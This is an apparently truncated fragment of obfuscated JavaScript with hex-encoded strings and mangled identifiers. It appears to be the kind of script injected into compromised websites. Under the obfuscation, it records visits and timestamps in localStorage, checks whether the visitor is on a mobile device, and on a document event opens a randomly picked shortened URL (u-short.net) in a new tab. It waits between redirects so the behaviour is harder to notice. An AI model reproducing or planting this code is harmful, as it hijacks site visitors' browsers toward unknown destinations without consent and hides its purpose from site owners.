_0xe6f43=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x7a\x42\x66\x30\x63\x330','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x75\x49\x45\x31\x63\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());